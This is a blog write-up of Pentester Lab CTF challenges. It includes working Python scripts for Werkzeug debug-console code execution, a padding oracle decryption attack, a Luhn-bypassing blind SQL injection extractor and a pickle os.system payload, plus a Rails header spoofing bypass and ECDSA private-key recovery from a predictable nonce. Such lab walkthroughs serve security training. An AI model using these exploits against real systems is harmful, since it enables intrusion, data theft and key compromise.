Pentester Lab is a great site. If you haven’t done any of the challenges I highly recommend that you head over and try it out.
The pro version of the site has various badge tracks and even sends you a certificate of completion. I received my certificate for the CTF badge the other day, and I figured I’d do a write-up of the challenges for others who might be interested.
Spoiler Alert: The solutions are posted below. If you plan on doing the CTF badge, don’t cheat — it will take all the fun out of it :).
The first challenge is the exploitation of CVE-2015-3224. This CVE is a vulnerability in the Ruby on Rails debug console present in Rails versions 3.x and 4.x.
The debug console is only permitted when the connection is initiated from localhost. This is intended to let a developer working locally use an interactive Ruby shell to inspect variables, issue queries, and perform other tasks to figure out why an exception occurred. It also grants code execution, which is generally not a problem since the console is only supposed to be reachable locally anyway.
The issue detailed by the CVE is a whitelist bypass. Services designed to sit behind a front-end load balancer take the client address from the X-Forwarded-For or X-Real-IP headers, so on a misconfigured app a remote user can spoof their source address simply by setting those headers. The bypass in this case is setting the X-Forwarded-For header to “0000::1”, an alternate way of writing the IPv6 loopback address ::1.
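The trick can be verified with Python’s standard library: “0000::1” parses to the loopback address even though it doesn’t string-match “::1”, which is exactly why naive string-based whitelists miss it.

```python
import ipaddress

# "0000::1" normalizes to the IPv6 loopback ::1, even though it doesn't
# string-match "::1" -- which is how it slips past naive whitelists.
spoofed = ipaddress.ip_address("0000::1")
print(spoofed == ipaddress.ip_address("::1"))  # True
print(spoofed.is_loopback)                     # True
print("0000::1" == "::1")                      # False: string checks miss it

# The request that triggers the bypass (hypothetical target host):
#   GET / HTTP/1.1
#   Host: vulnerable-rails-app
#   X-Forwarded-For: 0000::1
```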
Werkzeug Debug Mode
Werkzeug debug mode is similar to the Rails debug console issue above, except that it includes no such whitelisting. The documentation has some pretty strong warnings about the dangers of exposing this functionality to the public Internet. In fact, this is apparently how Patreon got hacked in 2015.
The exploit code for this one is pretty simple:
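In outline: fetch the debugger’s console page, scrape the per-session SECRET token out of its JavaScript, then evaluate arbitrary Python through the console endpoint. A sketch, assuming a hypothetical host and no debugger PIN (the endpoint, parameter names, and SECRET-scraping regex are based on how the Werkzeug debugger commonly works, not taken from the exercise):

```python
import re
import urllib.parse
import urllib.request

def werkzeug_console_rce(base_url, command):
    """Sketch: run a shell command through an exposed Werkzeug debug console.

    Assumes the console is reachable at /console (the Flask/Werkzeug
    default when debug mode is on) and that no debugger PIN is set.
    """
    # The debugger page embeds a per-session token in its JavaScript,
    # e.g.:  SECRET = "AbC123...";
    page = urllib.request.urlopen(base_url + "/console").read().decode()
    secret = re.search(r'SECRET = "([^"]+)"', page).group(1)

    # The console endpoint evaluates the `cmd` parameter as Python.
    query = urllib.parse.urlencode({
        "__debugger__": "yes",
        "frm": "0",
        "s": secret,
        "cmd": "__import__('os').popen(%r).read()" % command,
    })
    return urllib.request.urlopen(base_url + "/console?" + query).read().decode()

# Usage against a hypothetical vulnerable host:
# print(werkzeug_console_rce("http://target.example", "cat /etc/passwd"))
```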
A padding oracle is an API (local or remote) that an attacker can use to determine whether the PKCS#7 padding on CBC-mode encrypted ciphertext is valid. This is interesting because, in CBC mode, each plaintext byte is just the XOR of a decrypted block byte with a byte of the previous ciphertext block, so the oracle’s valid/invalid answers leak the plaintext one byte at a time. For more information on this issue, read the Wikipedia article.
If you’re interested in understanding this crypto attack (and others) in depth, I highly recommend doing the Matasano Crypto challenges. You will be able to break real-world crypto after doing those challenges. I’ve actually used the padding oracle attack in a penetration test and the client was blown away.
The site for this exercise includes registration and login functionality. After registering and logging in, I noticed what appeared to be an encrypted session cookie. When I tampered with the cookie in Burp Suite, the page returned “Invalid Padding”. It’s also worth mentioning that when the cookie was URL- and base64-decoded, its length was cleanly divisible by 8. This indicated that it was likely encrypted with a block cipher whose block size was 8 bytes.
For this exercise I decided to cheat a bit. Coding a padding oracle attack from scratch isn’t hard per se, but it’s not that much fun either. I decided to use a pre-built Python library, which is aptly named python-paddingoracle. It presents a nice clean API and you only have to write the logic to interface with the oracle and return a true/false response.
To exploit this issue, I ran the padding oracle attack twice. The first time, I decrypted the cookie value from a user I registered to learn the format. Then I created my own plaintext cookie for the admin user and used the padding oracle attack to encrypt it. That’s the beauty of a padding oracle attack: you can decrypt and encrypt values without knowing the key.
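To make the mechanics concrete, here is a self-contained sketch of the decryption side against a local toy oracle. A secret byte substitution stands in for the real cipher, which is fair game: the attack never looks inside the cipher, only at the CBC structure and the oracle’s yes/no answer.

```python
import os
import random

BLOCK = 8

# Toy "block cipher": a secret byte substitution (stand-in for DES/AES).
_sbox = list(range(256))
random.Random(1337).shuffle(_sbox)
_inv = [0] * 256
for _i, _v in enumerate(_sbox):
    _inv[_v] = _i

def _enc_block(b):
    return bytes(_sbox[x] for x in b)

def _dec_block(b):
    return bytes(_inv[x] for x in b)

def cbc_encrypt(pt):
    pad = BLOCK - len(pt) % BLOCK
    pt += bytes([pad]) * pad
    prev = os.urandom(BLOCK)            # IV, prepended to the output
    out = prev
    for i in range(0, len(pt), BLOCK):
        prev = _enc_block(bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out += prev
    return out

def oracle(ct):
    """All the attacker learns: is the PKCS#7 padding valid?"""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    pt = b"".join(bytes(a ^ b for a, b in zip(_dec_block(c), p))
                  for p, c in zip(blocks, blocks[1:]))
    pad = pt[-1]
    return 1 <= pad <= BLOCK and pt.endswith(bytes([pad]) * pad)

def attack_block(prev, blk):
    """Recover one plaintext block by forging the preceding block."""
    inter = bytearray(BLOCK)            # D(blk), the pre-XOR state
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        for guess in range(256):
            fake = bytearray(BLOCK)
            fake[pos] = guess
            for j in range(pos + 1, BLOCK):
                fake[j] = inter[j] ^ pad    # force known bytes to `pad`
            if oracle(bytes(fake) + blk):
                if pos == BLOCK - 1:
                    # Rule out an accidental longer padding by
                    # perturbing the second-to-last byte.
                    fake[pos - 1] ^= 0xFF
                    if not oracle(bytes(fake) + blk):
                        continue
                inter[pos] = guess ^ pad
                break
    return bytes(i ^ p for i, p in zip(inter, prev))

ct = cbc_encrypt(b"user=admin")
blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
recovered = b"".join(attack_block(p, c) for p, c in zip(blocks, blocks[1:]))
print(recovered)   # b'user=admin\x06\x06\x06\x06\x06\x06'
```

Encrypting a chosen plaintext works the same way in reverse: recover the intermediate state D(C) for a block, then choose the preceding block so the XOR yields the bytes you want.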
Exploit code is shown below.
This is an interesting exercise. It’s a website that checks whether a credit card number is compromised. Entering the value “4111111111111111” returns “Your CC has been compromised”. This number is a common test number used when doing QA on web-based shopping carts.
A little experimentation yielded an obvious SQL injection vulnerability, but it didn’t appear to be exploitable with SQLmap due to some server-side validation. Some quick Googling on the word Luhn indicates that the validation is a checksum algorithm called the Luhn algorithm. This algorithm is used to validate credit card and bank card numbers.
It took a bit of experimentation in Burp Suite to get this to work. The server-side validation only checks the digits against the Luhn algorithm, so it was possible to sneak in any other characters without influencing validation.
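For illustration, here is a minimal Luhn check that, like the server apparently does, considers only the digits — so a digit-free SQL payload rides along without disturbing the checksum:

```python
def luhn_valid(s):
    # Like the server's check: non-digit characters are ignored entirely.
    digits = [int(c) for c in s if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2:          # double every second digit from the right...
            d *= 2
            if d > 9:
                d -= 9     # ...and cast out nines
        total += d
    return total % 10 == 0

print(luhn_valid("4111111111111111"))             # True
print(luhn_valid("4111111111111112"))             # False
# A digit-free injection leaves the checksum untouched:
print(luhn_valid("4111111111111111' AND ''='"))   # True
```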
I chose to use Boolean blind SQL injection to exfiltrate the data. To do this, I created a conditional query that returned the aforementioned “compromised” number when the condition was true. If the condition was false, the query returned nothing and the web site responded with a message indicating that the credit card was not in the database. If the query didn’t pass the server-side checks, the web site responded with “Invalid CC”. This allowed me to write a quick script that used the SUBSTR function on a subquery to test whether the next character was correctly guessed.
The script is shown below. It takes a bit of time to run. There are many ways it could be optimized but I wasn’t in a hurry anyway.
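The core loop looks something like the sketch below. The endpoint, parameter, and response strings are hypothetical stand-ins, and it glosses over one wrinkle: digits inside the SUBSTR arguments also count toward the Luhn checksum, so in practice the payload needs compensating digits (or digit-free position expressions) to keep passing validation.

```python
import string
import urllib.parse
import urllib.request

# Hypothetical endpoint and response strings -- adjust to the real site.
URL = "http://target.example/check?cc="

def condition_true(cond):
    """The true branch returns the known-compromised number, so the page
    reports it; the false branch returns nothing."""
    payload = "4111111111111111' AND (%s) AND ''='" % cond
    page = urllib.request.urlopen(URL + urllib.parse.quote(payload)).read().decode()
    return "has been compromised" in page

def extract(subquery, oracle=condition_true,
            alphabet=string.ascii_letters + string.digits + "_"):
    """Boolean-blind extraction: guess one character at a time by testing
    SUBSTR of the subquery's result against the oracle."""
    out = ""
    while True:
        for c in alphabet:
            if oracle("SUBSTR((%s), %d, 1) = '%s'" % (subquery, len(out) + 1, c)):
                out += c
                break
        else:
            return out        # no character matched: end of the string

# e.g. (MySQL): extract("SELECT table_name FROM information_schema.tables LIMIT 1")
```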
According to the description on Pentester Lab, this exercise is “SQL injection combined with remote code execution”. I immediately jumped to the conclusion that it must be union-based SQL injection, and that the vulnerability was likely Python Pickle deserialization.
Since the table rows on the site were probably displayed exactly as they were stored in the database, I deemed it unnecessary to test how many fields were present or what their data types were. So the SQL injection part appeared to be dead simple.
For the Python Pickle deserialization exploit, I created a custom Python object with a __reduce__ method. This method is used by the Pickle library to determine how to serialize the object. It should return a tuple, where the first element is a callable and the second is a tuple of arguments to pass to it. See the Python documentation for more information.
This means that if the __reduce__ method returns os.system as the first value and a tuple with a single string entry (defining a shell command to run) as the second, the result will be arbitrary code execution. The final exploit is shown below.
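The deserialization half can be sketched as follows; the command and base64 encoding are illustrative, and the union-based SQL injection delivery is omitted:

```python
import base64
import os
import pickle

class Exploit(object):
    # pickle consults __reduce__ when serializing: return a callable plus
    # an argument tuple, and unpickling the result calls os.system("id").
    def __reduce__(self):
        return (os.system, ("id",))

payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload)
# Wherever the application unpickles attacker-controlled data (here,
# presumably a value smuggled in via the SQL injection), loading this
# payload executes the command.
```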
Source code for this exercise is provided on the site. It also includes register and login functionality. Before I read the code, I decided to do a little reading up on ECDSA. Fortunately, Wikipedia has a good article on ECDSA.
I don’t know if it’s just me, but it seems like for a lot of hacking you just need to read the documentation and look for bolded text. Go skim the Wikipedia article for a second. Notice the bold text?
Select a cryptographically secure random integer k from [1,n−1].
Okay, thanks Wikipedia. After reading the source code and checking the ECDSA rubydoc, I found this gem:
```ruby
def sign(str)
  digest = Digest::SHA256.digest(str)
  temp_key = str.size
  signature = ECDSA.sign($group, $private_key, digest, temp_key)
end
```
It turns out that in this case, temp_key is the value of k, which is predictable. That doesn’t seem too hard to exploit.
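With k known, a single signature is enough to recover the private key: ECDSA computes s = k⁻¹(z + r·d) mod n, where z is the message hash as an integer and d is the private key, so d = r⁻¹(s·k − z) mod n. (In this challenge, k is just the message length and z the SHA-256 digest.) A sketch of the algebra with toy values; no curve arithmetic is needed to check the identity:

```python
def recover_private_key(r, s, z, k, n):
    # From s = k^-1 * (z + r*d) mod n, solve for the private key d:
    #   d = r^-1 * (s*k - z) mod n
    return (pow(r, -1, n) * (s * k - z)) % n

# Sanity-check with made-up numbers; n is the P-256 group order.
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
d, k, z, r = 0x1234, 0x42, 0xCAFE, 0xBEEF
s = pow(k, -1, n) * (z + r * d) % n
print(recover_private_key(r, s, z, k, n) == d)   # True
```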
You might have noticed that all my exploits for this CTF are in Python. In the past I’ve always used Ruby, but I’m giving Python a try. I feel compelled to explain why.
I love Ruby. I love how it feels like there’s less friction between me and the machine. Like I’m describing the solution to a problem in my native tongue. I like the clean OO model Ruby uses, and how everything is just an object — all the way down. I love the flexibility and metaprogramming that have provided us with ActiveRecord, Logstash and Puppet.
But here’s the thing: Ruby just doesn’t have nearly as many libraries, and a lot of the ones that do exist are not well maintained. Python has libraries like scikit-learn. It has libraries for reading and writing Word and Excel files, creating PDF files, and so much more. For the infosec/hacking crowd, it has great libraries and projects like Scapy, Responder.py, Impacket, Volatility, IDAPython, GDB plugins, Binary Ninja plugins, etc.
So now I’m using Python. I wouldn’t say that I’m “loving it”, but life isn’t perfect. So it goes.
As tempting as it was to write the solution in Ruby using the ECDSA gem, I decided to plod along and look for a Python ECDSA library. It didn’t take long to find one. I combed through the library looking for all the necessary functions and then read up on the attack. As it turns out, this is the same attack used to recover the PlayStation 3 signing key.
My solution is shown below: